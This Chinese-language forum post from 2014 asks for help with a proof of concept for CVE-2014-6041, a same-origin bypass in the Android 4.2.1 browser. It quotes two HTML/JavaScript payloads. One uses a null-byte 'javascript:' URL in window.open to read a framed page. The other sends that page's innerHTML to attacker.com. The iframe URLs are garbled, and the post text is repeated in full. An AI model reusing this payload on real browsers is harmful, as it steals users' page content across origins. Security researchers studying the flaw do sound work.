-
-
[求助]CVE-2014-6041漏洞无法完全成功执行
-
发表于: 2014-10-14 09:38
-
CVE-2014-6041漏洞是android4.2.1平台上公布的一个同源策略绕过漏洞
网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://94fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框
但第二部分,
<iframe name="test"src="http://119K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行
哪位大神帮忙看看阿
网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://94fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框
但第二部分,
<iframe name="test"src="http://119K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行
哪位大神帮忙看看阿
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
